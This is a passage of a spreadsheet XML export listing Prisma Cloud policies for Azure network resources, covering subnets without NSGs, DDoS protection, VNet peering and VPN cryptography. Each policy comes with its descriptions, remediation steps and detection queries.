Note: This policy will not report for subnets used by Azure Firewall Subnet, Azure Firewall Management Subnet, Gateway Subnet, NetApp File Share, Route Server Subnet, Private endpoints and Private links as Azure recommends not to configure Network Security Group (NSG) for these services.</t>
        </is>
      </c>
      <c r="X2353" t="inlineStr">
        <is>
          <t>1. Log in to the Azure Portal.
2. Select 'Virtual Networks', and select the virtual network you need to modify.
3. Select 'Subnets', and select the subnet you need to modify.
4. Select the Network security group (NSG) you want to associate with the subnet.
5. 'Save' your changes. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-31
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-31</t>
        </is>
      </c>
      <c r="Y2353" t="inlineStr"/>
      <c r="Z2353" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-network-subnet-list' AND json.rule = networkSecurityGroupId does not exist and name does not equal ignore case "GatewaySubnet" and name does not equal ignore case "RouteServerSubnet" and name does not equal ignore case "AzureFirewallSubnet" and name does not equal ignore case "AzureFirewallManagementSubnet" and ['properties.delegations'][*].['properties.serviceName'] does not equal "Microsoft.Netapp/volumes"
{"category":"General","resourceTypes":["azurerm_subnet"]}</t>
        </is>
      </c>
      <c r="AA2353" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2353" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2353" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-334-CKV2_AZURE_31</t>
        </is>
      </c>
      <c r="AD2353" t="b">
        <v>1</v>
      </c>
      <c r="AE2353" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2353" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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53" t="inlineStr">
        <is>
          <t>d3ed9388-fa76-44b7-ac6f-72503b6340e0</t>
        </is>
      </c>
      <c r="AI2353" t="inlineStr">
        <is>
          <t>4780e61a-51ac-46ff-822c-421a97b6c96e</t>
        </is>
      </c>
      <c r="AJ2353" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2353" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2354">
      <c r="A2354" t="inlineStr">
        <is>
          <t>CIS v1.4.0 (GKE) - Level 1</t>
        </is>
      </c>
      <c r="B2354" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2354" s="2" t="inlineStr"/>
      <c r="D2354" t="inlineStr"/>
      <c r="E2354" t="inlineStr"/>
      <c r="F2354" t="inlineStr"/>
      <c r="G2354" t="b">
        <v>0</v>
      </c>
      <c r="H23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354" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2354" t="inlineStr">
        <is>
          <t>azure-network-usage</t>
        </is>
      </c>
      <c r="K2354" t="inlineStr">
        <is>
          <t>CM Test Policy Demo</t>
        </is>
      </c>
      <c r="L2354" t="inlineStr"/>
      <c r="M2354" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2354" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2354" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2354" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2354" t="inlineStr">
        <is>
          <t>Worker Nodes</t>
        </is>
      </c>
      <c r="R2354" t="inlineStr">
        <is>
          <t>3.2.2</t>
        </is>
      </c>
      <c r="S2354" t="inlineStr"/>
      <c r="T2354" t="b">
        <v>0</v>
      </c>
      <c r="U2354" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2354" t="inlineStr">
        <is>
          <t>azure-network-usage</t>
        </is>
      </c>
      <c r="W2354" t="inlineStr"/>
      <c r="X2354" t="inlineStr"/>
      <c r="Y2354" t="inlineStr"/>
      <c r="Z2354" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-network-usage' AND json.rule = StaticPublicIPAddresses.currentValue greater than 1</t>
        </is>
      </c>
      <c r="AA2354" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2354" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2354" t="inlineStr"/>
      <c r="AD2354" t="b">
        <v>0</v>
      </c>
      <c r="AE2354" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2354" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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4" t="inlineStr">
        <is>
          <t>00e26436-6c38-48fb-8ab9-f82406930638</t>
        </is>
      </c>
      <c r="AI2354" t="inlineStr">
        <is>
          <t>f17ac28a-8ca8-4da9-b50f-77c2964ad89c</t>
        </is>
      </c>
      <c r="AJ2354" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2354" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2355">
      <c r="A2355" t="inlineStr">
        <is>
          <t>Azure Security Benchmark (v3)</t>
        </is>
      </c>
      <c r="B2355" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2355" s="2" t="inlineStr"/>
      <c r="D2355" t="n">
        <v>3</v>
      </c>
      <c r="E2355" t="n">
        <v>17</v>
      </c>
      <c r="F2355" t="n">
        <v>0</v>
      </c>
      <c r="G2355" t="b">
        <v>1</v>
      </c>
      <c r="H23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55" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2355" t="inlineStr">
        <is>
          <t>azure-network-usage</t>
        </is>
      </c>
      <c r="K2355" t="inlineStr">
        <is>
          <t>Test policy 4</t>
        </is>
      </c>
      <c r="L2355" t="inlineStr"/>
      <c r="M2355" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2355" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2355" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2355" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2355" t="inlineStr">
        <is>
          <t>Identity Management (IM)</t>
        </is>
      </c>
      <c r="R2355" t="inlineStr">
        <is>
          <t>IM-6</t>
        </is>
      </c>
      <c r="S2355" t="inlineStr"/>
      <c r="T2355" t="b">
        <v>0</v>
      </c>
      <c r="U2355" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2355" t="inlineStr">
        <is>
          <t>azure-network-usage</t>
        </is>
      </c>
      <c r="W2355" t="inlineStr"/>
      <c r="X2355" t="inlineStr"/>
      <c r="Y2355" t="inlineStr"/>
      <c r="Z2355" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-network-usage' AND json.rule = StaticPublicIPAddresses.currentValue greater than 1</t>
        </is>
      </c>
      <c r="AA2355" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB2355" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2355" t="inlineStr"/>
      <c r="AD2355" t="b">
        <v>0</v>
      </c>
      <c r="AE2355" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2355" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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55" t="inlineStr">
        <is>
          <t>8400d10f-3c2e-4169-a364-89e65e4b9123</t>
        </is>
      </c>
      <c r="AI2355" t="inlineStr">
        <is>
          <t>f41a1450-6728-4453-949e-acfd581c922e</t>
        </is>
      </c>
      <c r="AJ2355" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2355" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2356">
      <c r="A2356" t="inlineStr"/>
      <c r="B2356" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2356" s="2" t="inlineStr"/>
      <c r="D2356" t="inlineStr"/>
      <c r="E2356" t="inlineStr"/>
      <c r="F2356" t="inlineStr"/>
      <c r="G2356" t="b">
        <v>0</v>
      </c>
      <c r="H23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56" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2356" t="inlineStr">
        <is>
          <t>azure-network-vnet</t>
        </is>
      </c>
      <c r="K2356" t="inlineStr">
        <is>
          <t>llatorre -  This CIDR is already assigned to AzurePCSLab Subscription</t>
        </is>
      </c>
      <c r="L2356" t="inlineStr"/>
      <c r="M2356" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2356" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2356" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2356" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2356" t="inlineStr"/>
      <c r="R2356" t="inlineStr"/>
      <c r="S2356" t="inlineStr">
        <is>
          <t>llatorre</t>
        </is>
      </c>
      <c r="T2356" t="b">
        <v>0</v>
      </c>
      <c r="U2356" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2356" t="inlineStr">
        <is>
          <t>azure-network-vnet-list</t>
        </is>
      </c>
      <c r="W2356" t="inlineStr"/>
      <c r="X2356" t="inlineStr">
        <is>
          <t>Assign the right CIDR</t>
        </is>
      </c>
      <c r="Y2356" t="inlineStr"/>
      <c r="Z2356" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-network-vnet-list' AND json.rule = _IPAddress.inCIDRRange(['properties.addressSpace'].addressPrefixes,10.4.0.0/16) is true</t>
        </is>
      </c>
      <c r="AA2356" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2356" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2356" t="inlineStr"/>
      <c r="AD2356" t="b">
        <v>0</v>
      </c>
      <c r="AE2356" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2356" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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56" t="inlineStr">
        <is>
          <t>2cd5e407-b928-4475-a093-e454143a4c7f</t>
        </is>
      </c>
      <c r="AI2356" t="inlineStr">
        <is>
          <t>39d6c0fc-1c13-4b3b-89db-d7c58b4bbc97</t>
        </is>
      </c>
      <c r="AJ2356" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2356" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2357">
      <c r="A2357" t="inlineStr"/>
      <c r="B2357" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2357" s="2" t="inlineStr"/>
      <c r="D2357" t="inlineStr"/>
      <c r="E2357" t="inlineStr"/>
      <c r="F2357" t="inlineStr"/>
      <c r="G2357" t="b">
        <v>0</v>
      </c>
      <c r="H23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57" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2357" t="inlineStr">
        <is>
          <t>azure-network-vnet</t>
        </is>
      </c>
      <c r="K2357" t="inlineStr">
        <is>
          <t>llatorre -  This CIDR is already assigned to K-Lo_TestAccount_Azure Subscription</t>
        </is>
      </c>
      <c r="L2357" t="inlineStr"/>
      <c r="M2357" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2357" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2357" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2357" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2357" t="inlineStr"/>
      <c r="R2357" t="inlineStr"/>
      <c r="S2357" t="inlineStr">
        <is>
          <t>llatorre</t>
        </is>
      </c>
      <c r="T2357" t="b">
        <v>0</v>
      </c>
      <c r="U2357" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2357" t="inlineStr">
        <is>
          <t>azure-network-vnet-list</t>
        </is>
      </c>
      <c r="W2357" t="inlineStr"/>
      <c r="X2357" t="inlineStr">
        <is>
          <t>Assign the right CIDR</t>
        </is>
      </c>
      <c r="Y2357" t="inlineStr"/>
      <c r="Z2357" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-network-vnet-list' AND json.rule = _IPAddress.inCIDRRange(['properties.addressSpace'].addressPrefixes,10.0.0.0/24) is true</t>
        </is>
      </c>
      <c r="AA2357" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2357" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2357" t="inlineStr"/>
      <c r="AD2357" t="b">
        <v>0</v>
      </c>
      <c r="AE2357" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2357" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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57" t="inlineStr">
        <is>
          <t>4e8e5a23-3ede-4817-a509-c5a9f246424c</t>
        </is>
      </c>
      <c r="AI2357" t="inlineStr">
        <is>
          <t>18d85322-3372-4fee-9a22-e381b362f323</t>
        </is>
      </c>
      <c r="AJ2357" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2357" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2358">
      <c r="A2358" t="inlineStr">
        <is>
          <t>MLPS 2.0 (Level 2), Telecommunications Security Act - TSA, ITSG-33, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2024.2, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2022.2.1, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), TX-RAMP Level 2</t>
        </is>
      </c>
      <c r="B2358" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2358" s="2" t="inlineStr"/>
      <c r="D2358" t="inlineStr"/>
      <c r="E2358" t="inlineStr"/>
      <c r="F2358" t="inlineStr"/>
      <c r="G2358" t="b">
        <v>1</v>
      </c>
      <c r="H23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jbrox-oneAcc-DDoS,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58" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2358" t="inlineStr">
        <is>
          <t>azure-network-vnet</t>
        </is>
      </c>
      <c r="K2358" t="inlineStr">
        <is>
          <t>Azure Virtual network not protected by DDoS Protection Standard</t>
        </is>
      </c>
      <c r="L2358" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2358" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2358" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2358" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2358" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2358" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2358" t="inlineStr">
        <is>
          <t>SC-05-00 : Denial-of-service Protection</t>
        </is>
      </c>
      <c r="S2358" t="inlineStr"/>
      <c r="T2358" t="b">
        <v>0</v>
      </c>
      <c r="U2358" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2358" t="inlineStr">
        <is>
          <t>azure-network-vnet-list</t>
        </is>
      </c>
      <c r="W2358" t="inlineStr">
        <is>
          <t>This policy identifies Virtual networks not protected by DDoS Protection Standard. Distributed denial of service (DDoS) attacks are some of the largest availability and security concerns exhausting an application's resources, making the application unavailable to legitimate users. Azure DDoS Protection Standard provides enhanced DDoS mitigation features to defend against DDoS attacks.</t>
        </is>
      </c>
      <c r="X2358" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Go to Virtual networks dashboard 
3. Click on the reported Virtual network
4. Under the 'Settings', click on 'DDoS protection'
NOTE: Before enabling DDoS Protection, If already no DDoS protection plan exist you need to configure one DDoS protection plan for your organization by following below URL instructions:
https://docs.microsoft.com/en-us/azure/ddos-protection/manage-ddos-protection#create-a-ddos-protection-plan
5. Select 'Enable' for 'DDoS Protection Standard' and choose 'DDoS protection plan' from dropdown or enter DDoS protection plan resource ID.
6. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2358" t="inlineStr"/>
      <c r="Z2358" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-network-vnet-list' AND json.rule = ['properties.provisioningState'] equals Succeeded and (['properties.ddosProtectionPlan'].['id'] does not exist or ['properties.enableDdosProtection'] is false)</t>
        </is>
      </c>
      <c r="AA2358" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2358" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2358" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-855</t>
        </is>
      </c>
      <c r="AD2358" t="b">
        <v>1</v>
      </c>
      <c r="AE2358" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2358" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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jbrox-oneAcc-DDoS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58" t="inlineStr">
        <is>
          <t>348cbb26-2713-427d-8b9d-8d9d62af48f7</t>
        </is>
      </c>
      <c r="AI2358" t="inlineStr">
        <is>
          <t>1b6f9132-0cc9-4235-9e4e-c34fc715fa0a</t>
        </is>
      </c>
      <c r="AJ2358" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2358" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2359">
      <c r="A2359" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, HITRUST v.9.4.2 [Deprecated], kashan ACSC Information Security Manual (ISM), NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, New Zealand Information Security Manual (NZISM v3.4), PCI DSS v3.2.1, CIS Controls v8, NIST CSF, ISO/IEC 27017:2015, Insurance Regulatory And Development Authority Of India, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), CIS Controls v8.1, ISO/IEC 27002:2013, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-171 Revision 2, CIS Controls v7.1, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2359" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2359" s="2" t="inlineStr"/>
      <c r="D2359" t="inlineStr"/>
      <c r="E2359" t="inlineStr"/>
      <c r="F2359" t="inlineStr"/>
      <c r="G2359" t="b">
        <v>1</v>
      </c>
      <c r="H23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59" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2359" t="inlineStr">
        <is>
          <t>azure-network-vnet</t>
        </is>
      </c>
      <c r="K2359" t="inlineStr">
        <is>
          <t>Azure virtual network peer is disconnected</t>
        </is>
      </c>
      <c r="L2359" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2359" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2359" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2359" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2359" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2359" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2359" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2359" t="inlineStr"/>
      <c r="T2359" t="b">
        <v>0</v>
      </c>
      <c r="U2359" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2359" t="inlineStr">
        <is>
          <t>azure-network-vnet-list</t>
        </is>
      </c>
      <c r="W2359" t="inlineStr">
        <is>
          <t>Virtual network peering enables you to connect two Azure virtual networks so that the resources in these networks are directly connected.
This policy identifies Azure virtual network peers that are disconnected. Typically, the disconnection happens when a peering configuration is deleted on one virtual network, and the other virtual network reports the peering status as disconnected.</t>
        </is>
      </c>
      <c r="X2359" t="inlineStr">
        <is>
          <t>To reconnect the virtual network peers, you need to delete the 'Disconnected' peering connection and re-configure the peering connection.
To re-configure the peering connection:
1. Log in to the Azure Portal.
2. Select 'Virtual Networks', and select the virtual network on which has 'Disconnected' peering.
3. Select 'Peerings'.
4. Delete the peering with 'Disconnected' status.
5. Select 'Add' to re-initiate the peering configuration.
6. Specify the 'Name' and target 'Virtual Network'.
7. Select 'OK'
8. Verify that peering state is 'Initiated'.
9. Repeat step 5-7 on the target/other vnet.
10. Verify that the peering state is 'Connected'</t>
        </is>
      </c>
      <c r="Y2359" t="inlineStr"/>
      <c r="Z2359" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-network-vnet-list'  AND json.rule = ['properties.virtualNetworkPeerings'][*].['properties.peeringState'] equals "Disconnected"</t>
        </is>
      </c>
      <c r="AA2359" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2359" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2359" t="inlineStr">
        <is>
          <t>PC-AZR-NWK-301</t>
        </is>
      </c>
      <c r="AD2359" t="b">
        <v>1</v>
      </c>
      <c r="AE2359" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2359" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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59" t="inlineStr">
        <is>
          <t>3fc7b5fc-9394-4cb7-9baf-aaccfd38e9d1</t>
        </is>
      </c>
      <c r="AI2359" t="inlineStr">
        <is>
          <t>177fdb75-0481-4349-bcd2-e172779fb63b</t>
        </is>
      </c>
      <c r="AJ2359" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2359" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2360">
      <c r="A2360" t="inlineStr">
        <is>
          <t>TX-RAMP Level 2, HIPAA, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, GDPR, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, GDPR, APRA (CPS 234) Information Security, NIST SP 800-172, TX-RAMP Level 2, ISO/IEC 27002:2013, PCI DSS v3.2.1, jbrox - GDPR, MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST CSF, ISO/IEC 27002:2013, Telecommunications Security Act - TSA, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, HITRUST CSF v9.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, New Zealand Information Security Manual (NZISM v3.4), kfirdaus AWS Account-CS, NIST 800-53 Rev 5, CIS Controls v8, NIST 800-53 Rev4, CyberSecurity Law of the People's Republic of China, ISO 27001:2013, ISO/IEC 27017:2015, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, GDPR, Telecommunications Security Act - TSA, Secure Controls Framework (SCF) - 2024.2, DORA, ISO/IEC 27002:2013, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), ISO 27001:2013, ISO/IEC 27018:2019, CyberSecurity Law of the People's Republic of China, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, jbrox - GDPR, ISO 27001:2013, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), ISO 27001:2013, APRA (CPS 234) Information Security, TX-RAMP Level 1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.1.02, SOC 2, NIST CSF, MITRE ATT&amp;CK v6.3 [Deprecated], HITRUST CSF v9.3 [Deprecated], GDPR, ISO/IEC 27001:2022, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, APRA (CPS 234) Information Security, CCPA 2018, PIPEDA, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ISO/IEC 27002:2013, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CIS Controls v7.1, CSA CCM v.4.0.1, HITRUST CSF v9.3 [Deprecated], HITRUST CSF v9.3 [Deprecated], Copy of New Zealand Information Security Manual (NZISM v3.4)</t>
        </is>
      </c>
      <c r="B2360" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2360" s="2" t="inlineStr"/>
      <c r="D2360" t="inlineStr"/>
      <c r="E2360" t="inlineStr"/>
      <c r="F2360" t="inlineStr"/>
      <c r="G2360" t="b">
        <v>0</v>
      </c>
      <c r="H23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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2360" t="inlineStr">
        <is>
          <t>azure-network-vpn</t>
        </is>
      </c>
      <c r="K2360" t="inlineStr">
        <is>
          <t>Azure VPN is not configured with cryptographic algorithm</t>
        </is>
      </c>
      <c r="L2360" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2360" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2360" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2360" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2360" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2360" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2360" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2360" t="inlineStr"/>
      <c r="T2360" t="b">
        <v>0</v>
      </c>
      <c r="U2360" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2360" t="inlineStr">
        <is>
          <t>azure-network-vpn-connection-list</t>
        </is>
      </c>
      <c r="W2360" t="inlineStr">
        <is>
          <t>This policy identifies Azure VPNs which are not configured with cryptographic algorithm. Azure VPN gateways to use a custom IPsec/IKE policy with specific cryptographic algorithms and key strengths, rather than the Azure default policy sets. IPsec and IKE protocol standard supports a wide range of cryptographic algorithms in various combinations. If customers do not request a specific combination of cryptographic algorithms and parameters, Azure VPN gateways use a set of default proposals. Typically due to compliance or security requirements, you can now configure your Azure VPN gateways to use a custom IPsec/IKE policy with specific cryptographic algorithms and key strengths, rather than the Azure default policy sets. It is thus recommended to use custom policy sets and choose strong cryptography.</t>
        </is>
      </c>
      <c r="X2360" t="inlineStr">
        <is>
          <t>Follow Microsoft Azure documentation and setup your respective VPN connections using strong recommended cryptographic requirements.
FMI: https://docs.microsoft.com/en-us/azure/vpn-gateway/vpn-gateway-about-compliance-crypto#cryptographic-requirements</t>
